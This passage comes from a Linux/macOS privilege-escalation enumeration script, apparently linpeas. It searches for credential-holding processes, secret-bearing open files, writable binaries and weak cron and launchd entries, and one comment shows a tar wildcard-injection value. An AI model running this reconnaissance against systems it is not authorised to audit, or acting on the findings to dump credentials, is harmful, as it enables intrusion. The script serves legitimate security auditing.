   6259   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory"
   6260   # Common credential-storing processes
   6261   cred_processes="gdm-password gnome-keyring-daemon lightdm vsftpd apache2 sshd: mysql postgres redis-server mongod memcached elasticsearch jenkins tomcat nginx php-fpm supervisord vncserver xrdp teamviewer"
   6262   # Check for credential-storing processes
   6263   for proc in $cred_processes; do
   6264     if echo "$pslist" | grep -q "$proc"; then
   6265       echo "$proc process found (dump creds from memory as root)" | sed "s,$proc,${SED_RED},"
   6266     else
   6267       echo_not_found "$proc"
   6268     fi
   6269   done
   6270   # Check for processes with open handles to credential files
   6271   echo ""
   6272   print_2title "Opened Files by processes" "T1003.007"
   6273   for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
   6274     # Skip if process doesn't exist or we can't access it
   6275     [ ! -d "/proc/$pid" ] && continue
   6276     [ ! -r "/proc/$pid/fd" ] && continue
   6277     # Get process user and command
   6278     proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
   6279     proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
   6280     [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
   6281     # Skip processes that start with "sed " or contain "linpeas.sh"
   6282     echo "$proc_cmd" | grep -q "^sed " && continue
   6283     echo "$proc_cmd" | grep -q "linpeas.sh" && continue
   6284     # Variable to store unique files for this process
   6285     seen_files=""
   6286     found_cred_files=""
   6287     # Check for open credential files
   6288     for fd in /proc/$pid/fd/*; do
   6289       [ ! -e "$fd" ] && continue
   6290       fd_target=$(readlink "$fd" 2>/dev/null)
   6291       [ -z "$fd_target" ] && continue
   6292       [ "$fd_target" = "/dev/null" ] && continue
   6293       echo "$fd_target" | grep -q "^socket:" && continue
   6294       echo "$fd_target" | grep -q "^anon_inode:" && continue
   6295       # Only add if not already seen (using case to check)
   6296       case " $seen_files " in
   6297         *" $fd_target "*) continue ;;
   6298         *)
   6299           seen_files="$seen_files $fd_target"
   6300           if [ -z "$found_cred_files" ]; then
   6301             echo "Process $pid ($proc_user) - $proc_cmd"
   6302             echo "  └─ Has open files:"
   6303             found_cred_files="yes"
   6304           fi
   6305           echo "    └─ $fd_target"
   6306           ;;
   6307       esac
   6308     done
   6309   done | sed -${E} "s,\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$,\1${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
   6310   # Check for processes with memory-mapped files that might contain credentials
   6311   echo ""
   6312   print_2title "Processes with memory-mapped credential files" "T1003.007"
   6313   for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
   6314     # Skip if process doesn't exist or we can't access it
   6315     [ ! -d "/proc/$pid" ] && continue
   6316     [ ! -r "/proc/$pid/maps" ] && continue
   6317     # Get process user and command
   6318     proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
   6319     proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
   6320     [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
   6321     # Check for memory-mapped files that might contain credentials
   6322     cred_files=$(grep -E '\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$' "/proc/$pid/maps" 2>/dev/null)
   6323     if [ -n "$cred_files" ]; then
   6324       echo "Process $pid ($proc_user) - $proc_cmd"
   6325       echo "  └─ Has memory-mapped credential files:"
   6326       echo "$cred_files" | while read -r line; do
   6327         filename=$(echo "$line" | sed "s,.*/\(.*\),\1,")
   6328         echo "    └─ $filename"
   6329       done
   6330     fi
   6331   done
   6332   echo ""
   6333 fi
   6334 
   6335 fi
   6336 
   6337 if check_mitre_filter "T1574,T1554"; then
   6338 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6339   if [ "$NOUSEPS" ]; then
   6340     print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" "T1574,T1554"
   6341     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes"
   6342     # Get list of writable binaries
   6343     binW=""
   6344     for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
   6345       # Skip if process doesn't exist or we can't access it
   6346       [ ! -r "/proc/$pid/exe" ] && continue
   6347       # Get binary path
   6348       bpath=$(readlink "/proc/$pid/exe" 2>/dev/null)
   6349       [ -z "$bpath" ] && continue
   6350       # Check if binary is writable
   6351       if [ -w "$bpath" ]; then
   6352         if [ -z "$binW" ]; then
   6353           binW="$bpath"
   6354         else
   6355           binW="$binW|$bpath"
   6356         fi
   6357       fi
   6358     done
   6359     # Get and display binary permissions
   6360     for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
   6361       # Skip if process doesn't exist or we can't access it
   6362       [ ! -r "/proc/$pid/exe" ] && continue
   6363       # Get binary path
   6364       bpath=$(readlink "/proc/$pid/exe" 2>/dev/null)
   6365       [ -z "$bpath" ] && continue
   6366       # Display binary permissions if file exists
   6367       if [ -e "$bpath" ]; then
   6368         ls -la "$bpath" 2>/dev/null
   6369       fi
   6370     done | grep -Ev "\sroot\s+root" | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
   6371     echo ""
   6372   fi
   6373 fi
   6374 
   6375 fi
   6376 
   6377 if check_mitre_filter "T1134.004"; then
   6378 if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
   6379   print_2title "Processes whose PPID belongs to a different user (not root)" "T1134.004"
   6380   print_info "You will know if a user can somehow spawn processes as a different user"
   6381   # Function to get user by PID using /proc
   6382   get_user_by_pid() {
   6383     if [ -r "/proc/$1/status" ]; then
   6384       grep "^Uid:" "/proc/$1/status" 2>/dev/null | awk '{print $2}'
   6385     fi
   6386   }
   6387   # Function to get username by UID
   6388   get_username_by_uid() {
   6389     if [ -r "/etc/passwd" ]; then
   6390       grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1
   6391     fi
   6392   }
   6393   # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
   6394   for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
   6395     # Skip if process doesn't exist or we can't access it
   6396     [ ! -r "/proc/$pid/status" ] && continue
   6397     # Get process user
   6398     user_uid=$(get_user_by_pid "$pid")
   6399     [ -z "$user_uid" ] && continue
   6400     user=$(get_username_by_uid "$user_uid")
   6401     [ -z "$user" ] && continue
   6402     # Get PPID
   6403     ppid=$(grep "^PPid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}')
   6404     [ -z "$ppid" ] || [ "$ppid" = "0" ] && continue
   6405     # Get PPID user
   6406     ppid_uid=$(get_user_by_pid "$ppid")
   6407     [ -z "$ppid_uid" ] && continue
   6408     ppid_user=$(get_username_by_uid "$ppid_uid")
   6409     [ -z "$ppid_user" ] && continue
   6410     # Check if users are different and PPID user is not root
   6411     if [ "$user" != "$ppid_user" ] && [ "$ppid_user" != "root" ]; then
   6412       echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
   6413     fi
   6414   done
   6415   echo ""
   6416 fi
   6417 
   6418 fi
   6419 
   6420 if check_mitre_filter "T1083"; then
   6421 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6422   if ! [ "$IAMROOT" ]; then
   6423     print_2title "Files opened by processes belonging to other users" "T1083"
   6424     print_info "This is usually empty because of the lack of privileges to read other user processes information"
   6425     # Function to get username by UID
   6426     get_username_by_uid() {
   6427       if [ -r "/etc/passwd" ]; then
   6428         grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1
   6429       fi
   6430     }
   6431     # Check each process
   6432     for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
   6433       # Skip if process doesn't exist or we can't access it
   6434       [ ! -r "/proc/$pid/status" ] && continue
   6435       [ ! -r "/proc/$pid/fd" ] && continue
   6436       # Get process user
   6437       user_uid=$(grep "^Uid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}')
   6438       [ -z "$user_uid" ] && continue
   6439       user=$(get_username_by_uid "$user_uid")
   6440       [ -z "$user" ] && continue
   6441       # Skip if process belongs to current user
   6442       [ "$user" = "$USER" ] && continue
   6443       # Get process command
   6444       cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
   6445       [ -z "$cmd" ] && continue
   6446       # Check file descriptors
   6447       for fd in /proc/$pid/fd/*; do
   6448         [ ! -e "$fd" ] && continue
   6449         fd_target=$(readlink "$fd" 2>/dev/null)
   6450         [ -z "$fd_target" ] && continue
   6451         # Skip if target doesn't exist or is a special file
   6452         [ ! -e "$fd_target" ] && continue
   6453         case "$fd_target" in
   6454           /dev/*|/proc/*|/sys/*) continue ;;
   6455         esac
   6456         echo "Process $pid ($user) - $cmd"
   6457         echo "  └─ Has open file: $fd_target" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
   6458       done
   6459     done
   6460     echo ""
   6461   fi
   6462 fi
   6463 
   6464 fi
   6465 
   6466 if check_mitre_filter "T1057"; then
   6467 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6468   if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
   6469     print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" "T1057"
   6470     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#frequent-cron-jobs"
   6471     temp_file=$(mktemp)
   6472     if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 
   6473       for i in $(seq 1 1210); do 
   6474         ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 
   6475       done;
   6476       sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 
   6477       rm "$temp_file";
   6478     fi
   6479     echo ""
   6480   fi
   6481 fi
   6482 
   6483 fi
   6484 
   6485 if check_mitre_filter "T1053.003"; then
   6486 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6487   print_2title "Check for vulnerable cron jobs" "T1053.003"
   6488   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
   6489   print_3title "Cron jobs list" "T1053.003"
   6490   command -v crontab 2>/dev/null || echo_not_found "crontab"
   6491   crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
   6492   command -v incrontab 2>/dev/null || echo_not_found "incrontab"
   6493   incrontab -l 2>/dev/null
   6494   ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
   6495   cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},"  | sed "s,root,${SED_RED},"
   6496   grep -Hn '^PATH=' /etc/crontab /etc/cron.d/* 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
   6497   grep -RInE 'pg_basebackup|run-parts|crontab-ui' /etc/crontab /etc/cron.d /etc/anacrontab /var/spool/cron/crontabs /etc/incron.d /var/spool/incron 2>/dev/null | sed -${E} "s,$cronjobsB,${SED_RED},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
   6498   crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
   6499   ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
   6500   atq 2>/dev/null
   6501   echo ""
   6502   print_3title "Cron files with hidden carriage returns" "T1053.003"
   6503   grep -IRl $'\r' /etc/crontab /etc/cron.d /var/spool/cron/crontabs 2>/dev/null | while read -r file; do
   6504     [ -n "$file" ] || continue
   6505     echo "$file" | sed -${E} "s,.*,${SED_RED},g"
   6506     sed -n 'l' "$file" 2>/dev/null | head -n 20
   6507   done
   6508   echo ""
   6509   print_3title "Checking for specific cron jobs vulnerabilities" "T1053.003"
   6510   # Function to check if a binary is writable and executable
   6511   check_binary_perms() {
   6512     local bin="$1"
   6513     [ -z "$bin" ] && return
   6514     # Skip if binary doesn't exist
   6515     [ ! -e "$bin" ] && return
   6516     # Check if it's a regular file
   6517     [ ! -f "$bin" ] && return
   6518     # Check if it's writable and executable
   6519     if [ -w "$bin" ]; then
   6520       echo "Writable binary: $bin"
   6521       ls -l "$bin" 2>/dev/null
   6522     fi
   6523   }
   6524   # Function to extract binary path from command
   6525   get_binary_path() {
   6526     local cmd="$1"
   6527     local bin=""
   6528     # Try to get the first word of the command
   6529     bin=$(echo "$cmd" | awk '{print $1}')
   6530     [ -z "$bin" ] && return
   6531     # If it's an absolute path, use it directly
   6532     if [ "$(echo "$bin" | cut -c1)" = "/" ]; then
   6533       echo "$bin"
   6534       return
   6535     fi
   6536     # If it's a relative path, try to resolve it
   6537     if [ -e "$bin" ]; then
   6538       echo "$(pwd)/$bin"
   6539       return
   6540     fi
   6541     # Try to find it in PATH
   6542     for path in $(echo "$PATH" | tr ':' ' '); do
   6543       if [ -x "$path/$bin" ]; then
   6544         echo "$path/$bin"
   6545         return
   6546       fi
   6547     done
   6548   }
   6549   # Function to check for privilege escalation vectors in a command
   6550   check_privesc_vectors() {
   6551     local cmd="$1"
   6552     local file="$2"
   6553     local findings=""
   6554     local bin=""
   6555     # Skip common false positives (mail commands, shell conditionals, variable assignments)
   6556     if echo "$cmd" | grep -qE '^(mail|echo|then|else|fi|if|for|while|do|done|case|esac|exit|return|break|continue|:|\[|test|\[\[|\]\]|true|false|source|\.|cd|pwd|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|^[[:space:]]*[A-Za-z0-9_]+[[:space:]]*[=:])'; then
   6557       return
   6558     fi
   6559     # Get the binary path
   6560     bin=$(get_binary_path "$cmd")
   6561     if [ -n "$bin" ]; then
   6562       check_binary_perms "$bin"
   6563     fi
   6564     # Check for wildcard injection vectors
   6565     # Attack: Using wildcards in tar/chmod/chown to execute arbitrary commands
   6566     # Example: tar cf archive.tar * (where * expands to --checkpoint=1 --checkpoint-action=exec=sh)
   6567     if echo "$cmd" | grep -qE '\*'; then
   6568       findings="${findings}POTENTIAL_WILDCARD_INJECTION: Command uses wildcards with potentially exploitable command\n"
   6569     fi
   6570     # Check for path hijacking vectors
   6571     # Attack: Using relative paths or commands without full path that can be hijacked
   6572     # Example: script.sh instead of /usr/bin/script.sh
   6573     if echo "$cmd" | grep -qE '^[[:space:]]*[^/][^[:space:]]*[[:space:]]'; then
   6574       # Skip common false positives like shell builtins, control structures, and variable assignments
   6575       # Also skip test commands ([ ]), logical operators (&& ||), and complex shell constructs
   6576       if ! echo "$cmd" | grep -qE '^[[:space:]]*(cd|\.|source|\./|if|then|else|fi|for|while|do|done|case|esac|exit|return|break|continue|:|\[[[:space:]]|test|\[\[|\]\]|true|false|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|[A-Za-z0-9_]+[[:space:]]*[=:]|&&|\|\||;|\(|\)|\{|\})'; then
   6577         findings="${findings}PATH_HIJACKING: Command uses relative path\n"
   6578       fi
   6579     fi
   6580     # Check for command injection vectors
   6581     # Attack: Using unquoted variables or command substitution that can be injected
   6582     # Example: echo $VAR or echo $(command)
   6583     if echo "$cmd" | grep -qE '\$\{?[A-Za-z0-9_]|\$\(|`'; then
   6584       findings="${findings}COMMAND_INJECTION: Command uses unquoted variables or command substitution\n"
   6585     fi
   6586     # Check for overly permissive commands
   6587     # Attack: Commands that can be used to escalate privileges
   6588     # Example: chmod 777, chown root, etc.
   6589     if echo "$cmd" | grep -qE '\b(chmod\s+[0-7]{3,4}|chown\s+root|chgrp\s+root|sudo|su |pkexec)\b'; then
   6590       findings="${findings}PERMISSIVE_COMMAND: Command modifies permissions or uses privilege escalation tools\n"
   6591     fi
   6592     # If any findings, print them
   6593     if [ -n "$findings" ]; then
   6594       echo "Potential privilege escalation in cron job:"
   6595       echo "  └─ File: $file"
   6596       echo "  └─ Command: $cmd"
   6597       if [ -n "$bin" ]; then
   6598         echo "  └─ Binary: $bin"
   6599       fi
   6600       echo "  └─ Findings:"
   6601       echo "$findings" | while read -r finding; do
   6602         [ -n "$finding" ] && echo "     * $finding"
   6603       done
   6604     fi
   6605   }
   6606   # Check system crontabs
   6607   #echo "Checking system crontabs..."
   6608   #for crontab in /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/* /var/spool/cron/crontabs/* /etc/at* /etc/anacrontab /etc/incron.d/* /var/spool/incron/*; do
   6609   #  [ ! -f "$crontab" ] && continue
   6610   #  [ ! -r "$crontab" ] && continue
   6611   #  # Check if the file is writable
   6612   #  if [ -w "$crontab" ]; then
   6613   #    echo "Writable cron file: $crontab"
   6614   #  fi
   6615   #  # Check each line for privilege escalation vectors
   6616   #  while IFS= read -r line || [ -n "$line" ]; do
   6617   #    # Skip comments and empty lines
   6618   #    case "$line" in
   6619   #      \#*|"") continue ;;
   6620   #    esac
   6621   #    # Extract the command part (everything after the time specification)
   6622   #    cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
   6623   #    [ -z "$cmd" ] && continue
   6624   #    check_privesc_vectors "$cmd" "$crontab"
   6625   #  done < "$crontab"
   6626   #done
   6627   # Check user crontabs
   6628   #echo "Checking user crontabs..."
   6629   #if command -v crontab >/dev/null 2>&1; then
   6630   #  # Check current user's crontab
   6631   #  crontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
   6632   #    case "$line" in
   6633   #      \#*|"") continue ;;
   6634   #    esac
   6635   #    cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
   6636   #    [ -z "$cmd" ] && continue
   6637   #    check_privesc_vectors "$cmd" "current user crontab"
   6638   #  done
   6639   #  # Check other users' crontabs if accessible
   6640   #  for user_crontab in /var/spool/cron/crontabs/*; do
   6641   #    [ ! -f "$user_crontab" ] && continue
   6642   #    [ ! -r "$user_crontab" ] && continue
   6643   #    username=$(basename "$user_crontab")
   6644   #    [ "$username" = "$USER" ] && continue
   6645   #    echo "Found crontab for user: $username"
   6646   #    while IFS= read -r line || [ -n "$line" ]; do
   6647   #      case "$line" in
   6648   #        \#*|"") continue ;;
   6649   #      esac
   6650   #      cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
   6651   #      [ -z "$cmd" ] && continue
   6652   #      check_privesc_vectors "$cmd" "$user_crontab"
   6653   #    done < "$user_crontab"
   6654   #  done
   6655   #else
   6656   #  echo_not_found "crontab"
   6657   #fi
   6658   # Check for writable cron directories
   6659   echo "Checking cron directories..."
   6660   for cron_dir in /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly /var/spool/cron/crontabs /usr/lib/cron/tabs /private/var/at/jobs /var/at/tabs /etc/periodic; do
   6661     [ ! -d "$cron_dir" ] && continue
   6662     if [ -w "$cron_dir" ]; then
   6663       echo "Writable cron directory: $cron_dir"
   6664     fi
   6665   done
   6666   if command -v run-parts >/dev/null 2>&1; then
   6667     print_3title "run-parts executable entries" "T1053.003"
   6668     for cron_dir in /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly; do
   6669       [ -d "$cron_dir" ] || continue
   6670       echo "[$cron_dir]"
   6671       run-parts --test "$cron_dir" 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
   6672     done
   6673     echo ""
   6674   fi
   6675   # Check for at jobs
   6676   #if command -v atq >/dev/null 2>&1; then
   6677   #  echo "Checking at jobs..."
   6678   #  atq 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
   6679   #    [ -z "$line" ] && continue
   6680   #    job_id=$(echo "$line" | awk '{print $1}')
   6681   #    [ -z "$job_id" ] && continue
   6682   #    at -c "$job_id" 2>/dev/null | while IFS= read -r cmd || [ -n "$cmd" ]; do
   6683   #      case "$cmd" in
   6684   #        \#*|"") continue ;;
   6685   #      esac
   6686   #      check_privesc_vectors "$cmd" "at job $job_id"
   6687   #    done
   6688   #  done
   6689   #fi
   6690   # Check for incron jobs
   6691   #if command -v incrontab >/dev/null 2>&1; then
   6692   #  echo "Checking incron jobs..."
   6693   #  incrontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
   6694   #    case "$line" in
   6695   #      \#*|"") continue ;;
   6696   #    esac
   6697   #    cmd=$(echo "$line" | awk '{print $3}')
   6698   #    [ -z "$cmd" ] && continue
   6699   #    check_privesc_vectors "$cmd" "incron job"
   6700   #  done
   6701   #fi
   6702 else
   6703   print_2title "Cron jobs" "T1053.003"
   6704   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
   6705   find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
   6706 fi
   6707 echo ""
   6708 
   6709 fi
   6710 
   6711 if check_mitre_filter "T1543.001"; then
   6712 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6713   if [ "$MACPEAS" ]; then
   6714     print_2title "Third party LaunchAgents & LaunchDemons" "T1543.001"
   6715     print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#launchd"
   6716     print_info "Checking for privilege escalation vectors in LaunchAgents & LaunchDaemons:"
   6717     print_info "1. Writable plist files"
   6718     print_info "2. Writable program binaries"
   6719     print_info "3. Environment variables with sensitive data"
   6720     print_info "4. Unsafe program arguments"
   6721     print_info "5. RunAtLoad with elevated privileges"
   6722     print_info "6. KeepAlive with elevated privileges"
   6723     # Function to check plist content for privilege escalation vectors
   6724     check_plist_content() {
   6725       local plist="$1"
   6726       local findings=""
   6727       # Check for environment variables
   6728       if defaults read "$plist" EnvironmentVariables 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then
   6729         findings="${findings}ENV_VARS: Contains sensitive environment variables\n"
   6730       fi
   6731       # Check for RunAtLoad with elevated privileges
   6732       if defaults read "$plist" RunAtLoad 2>/dev/null | grep -q "true"; then
   6733         if [ -w "$plist" ]; then
   6734           findings="${findings}RUN_AT_LOAD: Runs at load and plist is writable\n"
   6735         fi
   6736       fi
   6737       # Check for KeepAlive with elevated privileges
   6738       if defaults read "$plist" KeepAlive 2>/dev/null | grep -q "true"; then
   6739         if [ -w "$plist" ]; then
   6740           findings="${findings}KEEP_ALIVE: Keeps running and plist is writable\n"
   6741         fi
   6742       fi
   6743       # Check for unsafe program arguments
   6744       if defaults read "$plist" ProgramArguments 2>/dev/null | grep -qE '(sudo|su|chmod|chown|chroot|mount)'; then
   6745         findings="${findings}UNSAFE_ARGS: Uses potentially dangerous program arguments\n"
   6746       fi
   6747       # Check for writable working directory
   6748       if defaults read "$plist" WorkingDirectory 2>/dev/null | grep -qE '^/'; then
   6749         local workdir=$(defaults read "$plist" WorkingDirectory 2>/dev/null)
   6750         if [ -w "$workdir" ]; then
   6751           findings="${findings}WRITABLE_WORKDIR: Working directory is writable\n"
   6752         fi
   6753       fi
   6754       # If any findings, print them
   6755       if [ -n "$findings" ]; then
   6756         echo "Potential privilege escalation in: $plist"
   6757         echo "$findings" | while read -r finding; do
   6758           [ -n "$finding" ] && echo "  └─ $finding"
   6759         done
   6760       fi
   6761     }
   6762     # Check system and user LaunchAgents & LaunchDaemons
   6763     for plist_dir in /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/; do
   6764       [ ! -d "$plist_dir" ] && continue
   6765       echo "Checking $plist_dir..."
   6766       find "$plist_dir" -name "*.plist" 2>/dev/null | while read -r plist; do
   6767         # Check if plist is writable
   6768         if [ -w "$plist" ]; then
   6769           echo "Writable plist: $plist" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   6770         fi
   6771         # Get program path
   6772         program=""
   6773         program=$(defaults read "$plist" Program 2>/dev/null)
   6774         if ! [ "$program" ]; then
   6775           program=$(defaults read "$plist" ProgramArguments 2>/dev/null | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
   6776         fi
   6777         # Check if program is writable
   6778         if [ -n "$program" ] && [ -w "$program" ]; then
   6779           echo "Writable program: $program" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   6780           ls -l "$program" 2>/dev/null
   6781         fi
   6782         # Check plist content for privilege escalation vectors
   6783         check_plist_content "$plist"
   6784       done
   6785     done
   6786     echo ""
   6787     print_2title "StartupItems" "T1543.001"
   6788     print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items"
   6789     for startup_dir in /Library/StartupItems/ /System/Library/StartupItems/; do
   6790       [ ! -d "$startup_dir" ] && continue
   6791       echo "Checking $startup_dir..."
   6792       find "$startup_dir" -type f -executable 2>/dev/null | while read -r startup_item; do
   6793         if [ -w "$startup_item" ]; then
   6794           echo "Writable startup item: $startup_item" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   6795           ls -l "$startup_item" 2>/dev/null
   6796         fi
   6797       done
   6798     done
   6799     echo ""
   6800     print_2title "Login Items" "T1543.001"
   6801     print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items"
   6802     osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null | tr ", " "\n" | while read -r login_item; do
   6803       if [ -n "$login_item" ]; then
   6804         # Try to find the actual binary
   6805         binary_path=$(mdfind "kMDItemDisplayName == '$login_item'" 2>/dev/null | head -n 1)
   6806         if [ -n "$binary_path" ] && [ -w "$binary_path" ]; then
   6807           echo "Writable login item binary: $binary_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   6808           ls -l "$binary_path" 2>/dev/null
   6809         fi
   6810       fi
   6811     done
   6812     echo ""
   6813     print_2title "SPStartupItemDataType" "T1543.001"
   6814     system_profiler SPStartupItemDataType 2>/dev/null | while read -r line; do
   6815       if echo "$line" | grep -q "Location:"; then
   6816         location=$(echo "$line" | cut -d: -f2- | xargs)
   6817         if [ -w "$location" ]; then
   6818           echo "Writable startup item location: $location" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   6819           ls -l "$location" 2>/dev/null
   6820         fi
   6821       fi
   6822     done
   6823     echo ""
   6824     print_2title "Emond scripts" "T1543.001"
   6825     print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#emond"
   6826     if [ -d "/private/var/db/emondClients" ]; then
   6827       find "/private/var/db/emondClients" -type f 2>/dev/null | while read -r emond_script; do
   6828         if [ -w "$emond_script" ]; then
   6829           echo "Writable emond script: $emond_script" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   6830           ls -l "$emond_script" 2>/dev/null
   6831         fi
   6832       done
   6833     fi
   6834     echo ""
   6835     print_2title "Periodic tasks" "T1543.001"
   6836     print_info "Checking periodic tasks for privilege escalation vectors"
   6837     for periodic_dir in /etc/periodic/daily /etc/periodic/weekly /etc/periodic/monthly; do
   6838       [ ! -d "$periodic_dir" ] && continue
